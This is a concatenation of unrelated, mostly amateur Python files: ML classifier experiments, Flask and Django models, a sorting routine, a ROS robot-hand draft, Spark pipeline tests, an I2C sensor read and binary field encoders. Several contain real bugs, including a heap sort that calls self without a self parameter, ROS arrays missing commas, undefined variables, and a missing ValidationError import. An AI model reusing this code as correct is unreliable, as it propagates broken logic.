NC_File_Out_Assimilation_2_Parameter.sync()
NC_File_Out_Assimilation_2_Parameter.close()
NC_File_Out_Assimilation_2_Parameter_Copy.close()
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.sync()
NC_File_Out_Assimilation_2_Parameter_Obs_Dim.close()
NC_File_Out_Assimilation_2_Initial.close()
#Parameter_Soil_Space_Single = numpy.mean(Parameter_Soil_Space_Ensemble_Obs_Dim,axis=0)
#Parameter_Veg_Space_Single = numpy.mean(Parameter_Veg_Space_Ensemble_Obs_Dim,axis=0)
NC_File_Parameter_Space_Single.close()
del numexpr_a,numexpr_b,numexpr_c
gc.collect()
del gc.garbage[:]
if PDAF_Assim_Framework == 2: # Restart PP sever after PDAF MPI
job_server_node_array, active_nodes_server, PROCS_PER_NODE, PP_Port, PP_Servers_Per_Node = DAS_Driver_Common.Start_ppserver(mpi4py_comm, mpi4py_rank, mpi4py_name, DAS_Output_Path, Ensemble_Number, DAS_Depends_Path, active_nodes_server, Def_Region, NSLOTS, Def_Print, DasPy_Path, Def_PP, Def_CESM_Multi_Instance, PP_Port)
while len(job_server_node_array) < 1:
job_server_node_array = DAS_Driver_Common.Stop_ppserver(mpi4py_rank, Def_PP, DAS_Depends_Path, job_server_node_array, NSLOTS, DasPy_Path, active_nodes_server, PP_Servers_Per_Node)
job_server_node_array, active_nodes_server, PROCS_PER_NODE, PP_Port, PP_Servers_Per_Node = DAS_Driver_Common.Start_ppserver(mpi4py_comm, mpi4py_rank, mpi4py_name, DAS_Output_Path, Ensemble_Number, DAS_Depends_Path, active_nodes_server, Def_Region, NSLOTS, Def_Print, DasPy_Path, Def_PP, Def_CESM_Multi_Instance, PP_Port)
return Def_Par_Optimized, Initial_Perturbation_SM_Flag, Initial_Perturbation_ST_Flag, job_server_node_array, active_nodes_server, Optimized_Parameter_Index
|
from Features import Features
from sklearn import svm
from sklearn.naive_bayes import GaussianNB
from sklearn.naive_bayes import BernoulliNB
from sklearn.naive_bayes import MultinomialNB
from sklearn import tree
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import confusion_matrix
import logging
import os
import sys
import datetime
class Classifier(object):
"""
----------------- OUTDATED -----------------
This prototype is not more up to date with the other. It has been abandoned because its results were to low
"""
def __init__(self):
# ----------------- SETTINGS -----------------
generate_data = True
data_standardization = True
# ----------------- ALGORITHMS -----------------
tests = [("svm", "linear"), ("svm", "poly"), ("svm", "rbf"), ("svm", "sigmoid"), ("svm", "svc"),
("bayes", "gaussian"), ("bayes", "bernoulli"), ("knn", 11), ("knn", 53),
("knn", 101), ("dtree", "gini"), ("dtree", "entropy"), ("rforest", 10), ("rforest", 100),
("rforest", 1000), ("rforest", 10000)]
# ("bayes", "multinomial") cannot have negative values
# To use it train the data with data_standardization = False
k_values = [100, 500, 1000, 10000]
# Images directories
# ----------------- CHANGE TRAIN AND TEST DIRECTORY -----------------
train_dir = os.path.abspath("C:/git/Logos-Recognition-for-Webshop-Services/logorec/resources/images/train")
test_dir = os.path.abspath("C:/git/Logos-Recognition-for-Webshop-Services/logorec/resources/images/test")
# Start logging
logging.basicConfig(filename='data.log', filemode='w', level=logging.INFO)
if generate_data:
logging.warning("Generating data for train and test ...")
# Generate data for each logo types (e.g. MasterCard vs Other, Visa vs Other, etc.)
for k in k_values:
logging.info("Number of cluster (kmeans): " + str(k))
start_time = datetime.datetime.now()
feature = Features()
feature.generate_data(train_dir, k, data_standardization)
feature.save_data("train/" + str(k))
logging.info("Time train: " + str(datetime.datetime.now() - start_time))
start_time = datetime.datetime.now()
t_feature = Features()
t_feature.generate_data(test_dir, k, data_standardization, False,
feature.vocabulary, feature.std_slr)
t_feature.save_data("test/" + str(k))
logging.info("Time test: " + str(datetime.datetime.now() - start_time))
logging.warning("Generation ended.")
feature = Features()
logging.warning("Start test ...")
for algo in tests:
for k in k_values:
# Time initialisation
start_time = datetime.datetime.now()
# lead train data
feature.load_data("train/" + str(k))
# CLASSIFIER
if algo[0] == "svm":
# SVC
if algo[1] == "svc":
classifier = svm.LinearSVC()
else:
classifier = svm.SVC(kernel=algo[1])
if algo[0] == "bayes":
# Bayes
if algo[1] == "multinomial":
classifier = MultinomialNB()
elif algo[1] == "gaussian":
classifier = GaussianNB()
else:
classifier = BernoulliNB()
if algo[0] == "dtree":
# Decision tree
if algo[1] == "gini":
classifier = tree.DecisionTreeClassifier()
else:
classifier = tree.DecisionTreeClassifier(criterion="entropy")
if algo[0] == "knn":
# knn
classifier = KNeighborsClassifier(algo[1])
if algo[0] == "rforest":
# Random Forest
classifier = RandomForestClassifier(algo[1])
classifier.fit(feature.histograms, feature.main_images_class)
feature.load_data("test/" + str(k))
# Prediction generation
solutions = classifier.predict(feature.histograms)
confusion = confusion_matrix(feature.main_images_class, solutions)
# Print information
logging.info("Algorithm: " + str(algo[0]) + ": " + str(algo[1]))
logging.info("Number of cluster (kmeans): " + str(k))
logging.info("Time: " + str(datetime.datetime.now() - start_time))
logging.info("Confusion: ")
logging.info(confusion)
def main():
classifier = Classifier()
if __name__ == "__main__":
main()
|
# -*-coding:utf-8-*-
#这是表单文件
from flask_wtf import Form
from wtforms import StringField,SubmitField,TextAreaField,BooleanField,SelectField
from wtforms.validators import Required,Length,Email,Regexp
from ..models import Role,User
from flask_pagedown.fields import PageDownField
class PostForm(Form):
body=PageDownField('写下你想说的',validators=[Required()])
submit=SubmitField('发表文章')
#普通用户资料表单
class EditProfileForm(Form):
username=StringField('新昵称',validators=[Length(0,64),Regexp('^[^0-9].*$',0,'第一个字符不能是数字,那样太丑!')])
name=StringField('真实姓名',validators=[Length(0,64)])
location=StringField('坐标',validators=[Length(0,64)])
about_me=TextAreaField('我的信息')
submit=SubmitField('提交')
#管理员资料表单
class EditProfileAdminForm(Form):
email=StringField('邮箱地址',validators=[Required(),Length(1,64),Email()])
username=StringField('昵称',validators=[Required(),Length(1,64),Regexp('^[^0-9].*$',0,'第一个字符不能是数字,那样太丑!')])
confirmed=BooleanField('确认')
role=SelectField('角色',coerce=int)
name=StringField('真实姓名',validators=[Length(0,64)])
location=StringField('坐标',validators=[Length(0,64)])
about_me=TextAreaField('我的信息')
submit=SubmitField('提交')
def __init__(self,user,*args,**kwargs):
super(EditProfileAdminForm,self).__init__(*args,**kwargs)
self.role.choices=[(role.id,role.name) for role in Role.query.order_by(Role.name).all()]#为上边selectfield做选项,id对应标识符,name标志对象
self.user=user
#检查邮箱和用户名是否发生变化,若发生就查看其余已存在数据库中的有没有重合
def validate_email(self,field):
if field.data!=self.user.email and User.query.filter_by(email=field.data).first():
raise ValidationError('邮箱已经注册.')
def validate_username(self,field):
if field.data!=self.user.username and User.query.filter_by(username=field.data).first():
raise ValidationError('用户名已经注册.')
#评论提交表单
class CommentForm(Form):
body=StringField('',validators=[Required()])
submit=SubmitField('提交')
|
import time
class HeapSort:
def heapify(arr, n, i):
largest = i
l = 2 * i + 1
r = 2 * i + 2
if l < n and arr[i] < arr[l]:
largest = l
if r < n and arr[largest] < arr[r]:
largest = r
if largest != i:
arr[i], arr[largest] = arr[largest], arr[i]
heapify(arr, n, largest)
def heap_sort(vetor, tempo):
vetor.ordenado = False
n = len(vetor.lista)
for i in range(n, -1, -1):
self.heapify(vetor.lista, n, i)
time.sleep(tempo)
for i in range(n - 1, 0, -1):
vetor.lista[i], vetor.lista[0] = vetor.lista[0], vetor.lista[i]
heapify(vetor.lista, i, 0)
time.sleep(tempo)
vetor.ordenado = True
return vetor.lista |
from django.db import models
from django.contrib.auth.models import User
type_choices = (('0', 'PIN'),
('1', 'PASSWORD'))
class UserProfile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name="user_profile")
coins = models.IntegerField(default=0)
class PackageUserRelation(models.Model):
user_profile = models.ForeignKey(UserProfile, related_name="pur", on_delete=models.CASCADE)
package = models.ForeignKey("LevelPackage", on_delete=models.CASCADE, related_name="pur")
class Level(models.Model):
name = models.CharField(max_length=255, blank=True, null=True)
time = models.CharField(max_length=255, blank=True, null=True)
date = models.CharField(max_length=255, blank=True, null=True)
singer = models.CharField(max_length=255, blank=True, null=True)
song_name = models.CharField(max_length=255, blank=True, null=True)
msg_count = models.CharField(max_length=255, blank=True, null=True)
code = models.CharField(max_length=255, blank=True, null=True)
notif_sender = models.CharField(max_length=255, blank=True, null=True)
notif_msg = models.CharField(max_length=255, blank=True, null=True)
default_phone_number = models.CharField(max_length=255, blank=True, null=True)
hint_msg = models.CharField(max_length=255, blank=True, null=True)
incoming_call_number = models.CharField(max_length=255, blank=True, null=True)
incoming_call_name = models.CharField(max_length=255, blank=True, null=True)
clipboard_msg = models.CharField(max_length=255, blank=True, null=True)
second_name = models.CharField(max_length=255, blank=True, null=True)
second_text = models.CharField(max_length=255, blank=True, null=True)
hint_1 = models.CharField(max_length=255, blank=True, null=True)
hint_2 = models.CharField(max_length=255, blank=True, null=True)
hint1farsi = models.CharField(max_length=255, blank=True, null=True)
hint2farsi = models.CharField(max_length=255, blank=True, null=True)
type = models.CharField(max_length=1, choices=type_choices, default='0')
image = models.ImageField(max_length=255, blank=True, null=True)
cover = models.ImageField(max_length=255, blank=True, null=True)
incoming_call_image = models.ImageField(max_length=255, blank=True, null=True)
hint_count = models.IntegerField(blank=True, null=True, default=0)
pin_count = models.IntegerField(blank=True, null=True, default=4)
index = models.IntegerField(blank=True, null=True, default=4)
notif = models.BooleanField(default=False)
hint = models.BooleanField(default=False)
passed = models.BooleanField(default=False)
incoming_call = models.BooleanField(default=False)
clipboard = models.BooleanField(default=False)
second_notif = models.BooleanField(default=False)
contact_name = models.CharField(max_length=255, null=True, blank=True)
contact_number = models.CharField(max_length=255, null=True, blank=True)
def __str__(self):
return str(self.name)
class LevelPackage(models.Model):
name = models.CharField(max_length=255)
price = models.IntegerField()
image = models.ImageField(max_length=255, blank=True, null=True)
levels = models.ManyToManyField(Level, related_name="pack")
|
Number=int(input())
Reverse=0
while(Number>0):
Reminder=Number%10
Reverse=(Reverse*10)+Reminder
Number=Number//10
print(Reverse)
|
#!/usr/bin/env python3
#
# finger_counting.py
#
#
# Parameters: /robot_description URDF
#
import rospy
import numpy as np
from numpy.linalg import inv
from hw6code.kinematics import Kinematics #Check if this library actually exists or if you need to make a setup.py for it
from sensor_msgs.msg import JointState
#
# Joint States Publisher
#
# Isolate the ROS message publisher to keep the main code simpler.
#
class JointStatePublisher:
def __init__(self, names):
# Save the dofs = number of names.
self.n = len(names)
# Create a publisher to send the joint values (joint_states).
self.pub = rospy.Publisher("/joint_states", JointState, queue_size=100)
# Wait until connected. You don't have to wait, but the first
# messages might go out before the connection and hence be lost.
rospy.sleep(0.25)
# Create a joint state message.
self.msg = JointState()
# You have to explicitly name each joint: Keep appending to
# create a list.
for i in range(self.n):
self.msg.name.append(names[i])
# We should also prepare the position list, initialize to zero.
for i in range(self.n):
self.msg.position.append(0.0)
# Report.
rospy.loginfo("Ready to publish /joint_states with %d DOFs", self.n)
def dofs(self):
# Return the number of DOFs.
return self.n
def send(self, q):
# Set the positions.
for i in range(self.n):
self.msg.position[i] = q[i]
# Send the command (with specified time).
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
#
# Basic Rotation Matrices
#
def Rx(theta):
return np.array([[ 1, 0 , 0 ],
[ 0, np.cos(theta),-np.sin(theta)],
[ 0, np.sin(theta), np.cos(theta)]])
def Ry(theta):
return np.array([[ np.cos(theta), 0, np.sin(theta)],
[ 0 , 1, 0 ],
[-np.sin(theta), 0, np.cos(theta)]])
def Rz(theta):
return np.array([[ np.cos(theta), -np.sin(theta), 0 ],
[ np.sin(theta), np.cos(theta) , 0 ],
[ 0 , 0 , 1 ]])
#
# Simple Vector
#
# Just collect a 3x1 column vector
#
def vec(x,y,z):
return np.array([[x], [y], [z]])
# 6x1 Error Computation
#
# Note the 3x1 translation is on TOP of the 3x1 rotation error!
#
# Also note, the cross product does not return a column vector but
# just a one dimensional array. So we need to convert into a 2
# dimensional matrix, and transpose into the column form. And then
# we use vstack to stack vertically...
#
def etip(p, pd, R, Rd):
ep = pd - p
eR1 = 0.5 * (np.cross(R[:,0], Rd[:,0]) +
np.cross(R[:,1], Rd[:,1]) +
np.cross(R[:,2], Rd[:,2]))
eR = np.matrix.transpose(np.atleast_2d(eR1))
# return np.vstack((ep,eR)) Add this back in if doing rotation orientations as well
return ep
# Cubic Function Coefficient Calculator
#
# Takes in position and velocity values p0 and v0 at time t0
# and position and velocity values pf and vf at time tf and
# returns the four coefficients for the function.
def cubic_coeff(dt, p0, pf, v0, vf):
Y = np.array([[1, 0 , 0 , 0 ],
[0, 1 , 0 , 0 ],
[1, dt, dt**2, dt**3 ],
[0, 1 , 2*dt , 2*dt**2]] )
Yinv = np.linalg.inv(Y)
coeff = Yinv @ np.array([[p0], [pf], [v0], [vf]])
return coeff
def desired_path(t, dt, p0, pgoal):
c_t_x = cubic_coeff(dt, p0[0], pgoal[0], 0, 0)
c_t_y = cubic_coeff(dt, p0[1], pgoal[1], 0, 0)
c_t_z = cubic_coeff(dt, p0[2], pgoal[2], 0, 0)
coeffMat = np.array([c_t_x, c_t_y, c_t_z])
pd = np.array([1, t, t**2, t**3]) @ coeffMat
vd = np.array([0, 1, 2*t, 3*t**2]) @ coeffMat
return (pd, vd)
#
# Main Code
#
if __name__ == "__main__":
# LOGISTICAL SETUP
#
# Prepare the node.
rospy.init_node('finger_counting')
rospy.loginfo("Starting the code for finger counting...")
# Prepare a servo loop at 100Hz.
rate = 100;
servo = rospy.Rate(rate)
dt = servo.sleep_dur.to_sec()
rospy.loginfo("Running with a loop dt of %f seconds (%fHz)" %
(dt, rate))
# Set up the kinematics, from world to tip.
urdf = rospy.get_param('/robot_description')
kin_thumb = Kinematics(urdf, 'base_link', 'thumb_3')
N_thumb = kin_thumb.dofs()
kin_index = Kinematics(urdf, 'base_link', 'index_3')
N_index = kin_index.dofs()
kin_middle = Kinematics(urdf, 'base_link', 'middle_3')
N_middle = kin_middle.dofs()
kin_ring = Kinematics(urdf, 'base_link', 'ring_3')
N_ring = kin_ring.dofs()
kin_pinky = Kinematics(urdf, 'base_link', 'pinky_3')
N_pinky = kin_pinky.dofs()
# Allocate the memory for the numpy variables for tip position,
# tip orientation, and Jacobian. The kinematics code changes the
# data in place, so these need to be allocated! But the content
# will be overwritten so the initial values are irrelevant.
p_thumb = np.zeros((3,1))
R_thumb = np.identity(3)
J_thumb = np.zeros((6,N_thumb))
p_index = np.zeros((3,1))
R_index = np.identity(3)
J_index = np.zeros((6,N_index))
p_middle = np.zeros((3,1))
R_middle = np.identity(3)
J_middle = np.zeros((6,N_middle))
p_ring = np.zeros((3,1))
R_ring = np.identity(3)
J_ring = np.zeros((6,N_ring))
p_pinky = np.zeros((3,1))
R_pinky = np.identity(3)
J_pinky = np.zeros((6,N_pinky))
# Set up the publisher, naming the joints!
pub = JointStatePublisher(('thumb_palm', 'thumb_palm_updown', 'thumb_12', 'thumb_23',
'index_palm', 'index_12', 'index_23',
'middle_palm', 'middle_12', 'middle_23',
'rp_palm', 'ring_rp', 'ring_12', 'ring_23',
'pinky_rp', 'pinky_12', 'pinky_23'))
# Make sure the URDF and publisher agree in dimensions.
if not pub.dofs() == N_thumb + N_index + N_ring + N_pinky - 1:
rospy.logerr("FIX Publisher to agree with URDF!")
# Set the numpy printing options (as not to be overly confusing).
# This is entirely to make it look pretty (in my opinion).
np.set_printoptions(suppress = True, precision = 6)
# Close finger positions
# Used fkin to establish the closed positions to calculate errors/know where you are aiming for in the task space
theta_ti = np.array([[1.51], [0], [0.11], [0.18],
[0], [0.87], [1.42],
[0], [0], [0],
[0], [0], [0], [0],
[0], [0], [0]])
theta_tm = np.array([[1.12], [-0.38], [0.27], [0.31]
[0], [0], [0],
[0], [1.31], [1.16],
[0], [0], [0], [0],
[0], [0], [0]])
theta_tr = np.array([[1.19], [-0.91], [0.20], [0.30]
[0], [0], [0],
[0], [0], [0],
[0], [0.42], [1.33], [1.09],
[0], [0], [0]])
theta_tp = np.array([[1.41], [-1.07], [0.14], [0.13],
[0], [0], [0],
[0], [0], [0],
[0], [0], [0], [0],
[0.69], [1.17], [1.03]])
theta_start = np.zeros(pub.dofs(), 1)
# Find all the positions for an open hand
#
# Pseudo Code for testing
#
while not rospy.is_shutdown():
th_thumb = theta[0:3, :]
th_index = theta[4:6, :]
th_middle = theta[7:9, :]
th_ring = theta[10:13, :]
th_pinky = np.array([[theta[10], theta[14:16]]])
# Update the locations of each tip
kin_thumb.fkin(th_thumb, p_thumb, R_thumb)
kin_index.fkin(th_index, p_index, R_index)
kin_middle.fkin(th_middle, p_middle, R_middle)
kin_ring.fkin(th_ring, p_ring, R_ring)
kin_pinky.fkin(th_pinky, p_pinky, R_pinky)
# Calculate all the errors from the previous step:
e_thumb = etip(p_thumb, pd_thumb, R_thumb, Rd_thumb)
e_index = etip(p_index, pd_index, R_index, Rd_index)
e_middle = etip(p_middle, pd_middle, R_middle, Rd_middle)
e_ring = etip(p_ring, pd_ring, R_ring, Rd_ring)
e_pinky = etip(p_pinky, pd_pinky, R_pinky, Rd_pinky)
# Read some input, either of thumb position + closed state, or just what number to be achieved
# TODO: Set up subscriber to a gui?
# Would want the gui to not constantly send messages, but only send a message when
# a button is pressed like enter to send message
# Inputs from gui:
# Current position of thumb? (let person move thumb in designated x, y, z way)
# Whether open or close finger count
#
# OR
#
# Current position of thumb?
# What number to go to?
# From message, determine which finger to close (if closed == true)
# If 1st option, determine what the closest finger is to close with thumb
# if condition open vs. closed changed:
p_t0 = p_thumb
p_i0 = p_index
p_m0 = p_middle
p_r0 = p_ring
p_p0 = p_pinky
#TBH all the index through pinky fingers are likely going to have p_x0 be open or closed
p_thumb_goal = p_thumb_open
p_index_goal = p_index_open
p_middle_goal = p_middle_open
p_ring_goal = p_ring_open
p_pinky_goal = p_pinky_open
# if closed && 9
p_thumb_goal = p_thumb_ti
p_index_goal = p_index_ti
# else if closed && 8
p_thumb_goal = p_thumb_tmn
p_middle_goal = p_middle_tm
# else if closed && 7
p_thumb_goal = p_thumb_tr
p_ring_goal = p_ring_tr
# else if closed && 6
p_thumb_goal = p_thumb_tp
p_pinky_goal = p_pinky_tp
# Now that we have all the goals, we can calculate the desired positions
(pd_thumb, vd_thumb) = desired(t, total_t, p_t0, p_thumb_goal)
(pd_index, vd_index) = desired(t, total_t, p_i0, p_index_goal)
(pd_middle, vd_middle) = desired(t, total_t, p_m0, p_middle_goal)
(pd_ring, vd_ring) = desired(t, total_t, p_r0, p_ring_goal)
(pd_pinky, vd_pinky) = desired(t, total_t, p_r0, p_ring_goal)
# From these desired positions and velocities, we can probably get:
# Calculate thetas for the thumb position
vr_thumb = vd_thumb + lam * e_thumb # 3 x 1 column vector
Jv_thumb = J_thumb[0:2, :] # 3 x dofs matrix
Jvinv_thumb = np.linalg.pinv(Jv_thumb) # dofs x 3 matrix
theta_dot_thumb = Jvinv_thumb @ vr_thumb # dofs x 1 column vector
theta_thumb = theta_dot_thumb * dt # theta_palm, theta_palm_updown, theta_12, theta_23
# Calculate thetas for index position
vr_index = vd_index + lam * e_index # 3 x 1 column vector
Jv_index = J_index[0:2, :] # 3 x dofs matrix
Jvinv_index = np.linalg.pinv(Jv_index) # dofs x 3 matrix
theta_dot_index = Jvinv_index @ vr_index # dofs x 1 column vector
theta_index = theta_dot_index * dt # index_palm, index_12, index_23
# Calculate thetas for middle position
vr_middle = vd_middle + lam * e_middle # 3 x 1 column vector
Jv_middle = J_middle[0:2, :] # 3 x dofs matrix
Jvinv_middle = np.linalg.pinv(Jv_middle) # dofs x 3 matrix
theta_dot_middle = Jvinv_middle @ vr_middle # dofs x 1 column vector
theta_middle = theta_dot_middle * dt # middle_palm, middle_12, middle_23
# Calculate thetas for ring position
vr_ring = vd_ring + lam * e_ring # 3 x 1 column vector
Jv_ring = J_ring[0:2, :] # 3 x dofs matrix
Jvinv_ring = np.linalg.pinv(Jv_ring) # dofs x 3 matrix
theta_dot_ring = Jvinv_ring @ vr_ring # dofs x 1 column vector
theta_ring = theta_dot_ring * dt # rp_palm, ring_rp, ring_12, ring_23
# Calculate thetas for pinky position
vr_pinky = vd_pinky + lam * e_pinky # 3 x 1 column vector
Jv_pinky = J_pinky[0:2, :] # 3 x dofs matrix
Jvinv_pinky = np.linalg.pinv(Jv_pinky) # dofs x 3 matrix
theta_dot_pinky = Jvinv_pinky @ vr_pinky # dofs x 1 column vector
theta_pinky = theta_dot_pinky * dt # rp_palm, pinky_rp, pinky_12, pinky_23
# NOTE: RIGHT NOW RP_PALM IS IN BOTH THE PINKY BEND AND THE RING FINGER BEND.
# THIS MAY NOT BE AN ISSUE ARE RIGHT NOW RP_PALM IS BEING TREATED AS FIXED, BUT IF
# WE ACTUALLY FIXED THIS JOINT THEN WE MAY AVOID ERRORS. FOR NOW, WE'RE GOING TO ASSUME IT
# AS BEING FIXED, ST. theta_pinky[0] == theta_ring[0]
theta = np.vstack((theta_thumb, theta_index, theta_middle, theta_ring, theta_pinky[1:N_pinky-1]))
|
c = 1
while True:
try:
n = 1
a = int(input())
for i in range(a + 1):
n += i
if n == 1:
print('Caso {}: {} numero'.format(c, n))
else:
print('Caso {}: {} numeros'.format(c, n))
if a == 0:
print(0)
else:
print(0, end=' ')
for i in range(a+1):
for b in range(i):
if i == a and b == a - 1:
print(i)
else:
print(i, end=' ')
print('')
c += 1
except EOFError:
break |
from unittest import TestCase
from unittest import main as run_tests
from mock import mock_open, patch, MagicMock
from ..firestarter.firestarter import FireStarter
from ..firestarter.readers import HttpApi
from ..firestarter.igniters import Lighter
from ..firestarter.writers import HadoopFileSystem
from ..firestarter.pyspark import SparkConf, SparkContext
import json
class TestFireStarter(TestCase):
def setUp(self):
self.config_file = 'config_file.json'
self.firestarter = FireStarter(self.config_file)
self.firestarter.config_data = 'foo'
def test_init(self):
with patch.object(__builtins__, 'open', mock_open(read_data='foo')):
self.assertEqual(self.firestarter.config_file, self.config_file)
def test_read_config_file(self):
config_data = '{"json":"data"}'
with patch.object(__builtins__, 'open', mock_open(read_data=config_data)):
self.firestarter.read_config_file()
self.assertEqual(self.firestarter.config_data, config_data)
def test_parse_config_contents(self):
config = {'modules': {}}
with patch.object(json, 'loads', return_value=config):
self.firestarter.parse_config_contents()
self.assertEqual(self.firestarter.config, config)
def test_parse_config_contents_throws_value_error(self):
config = {'no_readers_defined': {}}
with patch.object(json, 'loads', return_value=config):
with self.assertRaises(ValueError):
self.firestarter.parse_config_contents()
def test_load_all_modules(self):
self.firestarter.config = {"modules": [{"name": "my_rest_api","type": "http_api","parameters": {"url": "http://drunken.guru/"}},{"name": "hive_query","type": "http_api","parameters": {"url": "http://original.guru/"}},{"name": "crunch_the_numbers","type": "lighter","parameters": {"math_rules": "2+2=4"}},{"name": "data_center_cluster","type": "hdfs","parameters": {"hive_table": "mydb.table.name"}}]}
with patch.object(HttpApi, '__init__', return_value=None):
with patch.object(Lighter, '__init__', return_value=None):
with patch.object(HadoopFileSystem, '__init__', return_value=None):
mock_http_api = MagicMock()
mock_lighter = MagicMock()
mock_hdfs = MagicMock()
mock_http_api.data = ['hello']
mock_lighter.data = ['world']
mock_hdfs.data = ['yall']
self.firestarter.mappings = mappings = {'http_api': mock_http_api, 'lighter': mock_lighter, 'hdfs': mock_hdfs}
self.firestarter.load_modules()
self.assertIn('my_rest_api', self.firestarter.modules)
self.assertEqual(id(self.firestarter.modules['my_rest_api'].data), id(mock_http_api.data))
self.assertIn('hive_query', self.firestarter.modules)
self.assertIn('data_center_cluster', self.firestarter.modules)
self.assertIn('my_rest_api', self.firestarter.data)
self.assertIn('hive_query', self.firestarter.data)
self.assertIn('data_center_cluster', self.firestarter.data)
def test_create_spark_context(self):
self.firestarter.config = {"spark_conf": {"app_name": "Fill Your Mother", "parameters": {"num_executors:": 4}}}
with patch.object(SparkConf, '__init__', return_value=None) as mock_spark_conf:
with patch.object(SparkConf, 'set', return_value=True) as mock_set:
with patch.object(SparkConf, 'setAppName', return_value=True) as mock_set_app_name:
with patch.object(SparkContext, '__init__', return_value=None) as mock_spark_context:
self.firestarter.create_spark_context()
mock_set_app_name.assert_called_once_with("Fill Your Mother")
mock_set.assert_called_once_with(*set(["num_executors:", 4]))
mock_spark_context.assert_called_once_with(**{"conf": self.firestarter.spark_config})
self.assertIsInstance(self.firestarter.sc, SparkContext)
def test_execute(self):
self.firestarter.read_config_file = MagicMock()
self.firestarter.parse_config_contents = MagicMock()
self.firestarter.load_modules = MagicMock()
self.firestarter.run_modules = MagicMock()
self.firestarter.execute()
self.firestarter.read_config_file.assert_called_once_with()
self.firestarter.parse_config_contents.assert_called_once_with()
self.firestarter.load_modules.assert_called_once_with()
self.firestarter.run_modules.assert_called_once_with()
# #integration test!
# def test_load_all_modules(self):
# self.firestarter.config = {"readers": [{"name": "my_rest_api","type": "http_api","parameters": {"url": "http://drunken.guru/"}}, {"name": "hive_query","type": "http_api","parameters": {"url": "http://original.guru/"}}],"igniters": [{"name": "crunch_the_numbers","type": "lighter","parameters": {"math_rules": "2+2=4"}}],"writers": [{"name": "data_center_cluster","type": "hdfs","parameters": {"hive_table": "mydb.table.name"}}]}
# with patch.object(Lighter, '__init__', return_value=None):
# with patch.object(HadoopFileSystem, '__init__', return_value=None):
# self.firestarter.load_modules()
# self.assertIsInstance(self.firestarter.readers[0], HttpApi)
# self.assertIsInstance(self.firestarter.readers[1], HttpApi)
# self.assertIsInstance(self.firestarter.igniters[0], Lighter)
# self.assertIsInstance(self.firestarter.writers[0], HadoopFileSystem)
# self.assertIsInstance(self.firestarter.modules['my_rest_api'], HttpApi)
# self.assertIsInstance(self.firestarter.modules['hive_query'], HttpApi)
# self.assertIsInstance(self.firestarter.modules['readers'][0], HttpApi)
# self.assertIsInstance(self.firestarter.modules['igniters'][0], Lighter)
# self.assertIsInstance(self.firestarter.modules['writers'][0], HadoopFileSystem)
# self.assertEqual(self.firestarter.modules['my_rest_api'], self.firestarter.readers[0])
if __name__ == '__main__':
run_tests()
|
import smbus
BUS = 1 # Which smbus to use, i.e /dev/i2c-1 is bus = 1
ADDRESS = 0x48 # Address of the device to talk to over I2C/smbus
#Setup SMBus access
bus = smbus.SMBus(BUS)
# Read two bytes from register 01, the config register
config = bus.read_word_data(ADDRESS, 0x01) & 0xFFFF
print('Config value: 0x{0:04X}'.format(config))
# Write two bytes to the config register
new_config = 0b0100001110000011
bus.write_word_data(ADDRESS, 0x01, new_config)
# Read two bytes from register 00, the ADC value.
value = bus.read_word_data(ADDRESS, 0x00) & 0xFFFF
# Swap byte order from little endian to big endian
value = ((value & 0xFFFF) << 8) | (value >> 8)
print('Raw ADC value: 0x{0:04X}'.format(value)) |
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
from .make_coffee import MakeCoffee
__all__ = [
'MakeCoffee',
]
|
# -*- coding: utf-8 -*-
from struct import pack, unpack
class Field(object):
LENGTH = None
def contribute_to_class(self, cls, name):
cls._meta.add_field(self, name)
@classmethod
def guess_length(cls, data):
return cls.LENGTH
@classmethod
def decode(cls, data):
raise NotImplementedError()
@classmethod
def encode(cls, value):
raise NotImplementedError()
class NumericField(Field):
LENGTH = None
PACK_FORMAT = None
@classmethod
def get_min_value(cls):
raise NotImplementedError()
@classmethod
def get_max_value(cls):
raise NotImplementedError()
@classmethod
def decode(cls, data):
return unpack(cls.PACK_FORMAT, data)[0]
@classmethod
def encode(cls, value):
if value < cls.get_min_value() or value > cls.get_max_value():
raise OverflowError()
return pack(cls.PACK_FORMAT, value)
class SignedNumericField(NumericField):
@classmethod
def get_min_value(cls):
return -pow(2, 8 * cls.LENGTH - 1) + 1
@classmethod
def get_max_value(cls):
return pow(2, 8 * cls.LENGTH - 1) - 1
class UnsignedNumericField(NumericField):
@classmethod
def get_min_value(cls):
return 0
@classmethod
def get_max_value(cls):
return pow(2, 8 * cls.LENGTH) - 1
class ByteField(SignedNumericField):
LENGTH = 1
PACK_FORMAT = "!b"
class UnsignedByteField(UnsignedNumericField):
LENGTH = 1
PACK_FORMAT = "!B"
@classmethod
def get_min_value(cls):
return 0
@classmethod
def get_max_value(cls):
return pow(2, 8 * cls.LENGTH) - 1
class UnsignedShortField(UnsignedByteField):
LENGTH = 2
PACK_FORMAT = "!H"
class IntField(SignedNumericField):
LENGTH = 4
PACK_FORMAT = "!i"
class LongLongField(SignedNumericField):
LENGTH = 8
PACK_FORMAT = "!q"
class FloatField(NumericField):
LENGTH = 4
PACK_FORMAT = "!f"
@classmethod
def get_min_value(cls):
return float("-inf") # OverflowError will be raised at runtime
@classmethod
def get_max_value(cls):
return float("inf") # OverflowError will be raised at runtime
@classmethod
def encode(cls, value):
return super(FloatField, cls).encode(float(value))
@classmethod
def decode(cls, data):
return float(super(FloatField, cls).decode(data))
class DoubleField(FloatField):
LENGTH = 8
PACK_FORMAT = "!d"
class BoolField(Field):
LENGTH = 1
@classmethod
def decode(cls, data):
return bool(ByteField.decode(data))
@classmethod
def encode(cls, value):
return ByteField.encode(bool(value))
class StringField(Field):
LENGTH_FIELD = UnsignedShortField
@classmethod
def guess_length(cls, data):
# encoded data length + actual data
return cls.LENGTH_FIELD.LENGTH + cls.LENGTH_FIELD.decode(data[:cls.LENGTH_FIELD.LENGTH])
@classmethod
def decode(cls, data):
return data[cls.LENGTH_FIELD.LENGTH:].decode("utf-8")
@classmethod
def encode(cls, value):
value = value.encode("utf-8")
return cls.LENGTH_FIELD.encode(len(value)) + value
|
from django.db import models
from django.db.models.query import QuerySet
from django.utils.translation import ugettext_lazy as _
from teams.models import Team
class MatchMixin(object):
pass
class MatchQuerySet(QuerySet, MatchMixin):
pass
class MatchManager(models.Manager, MatchMixin):
def get_queryset(self):
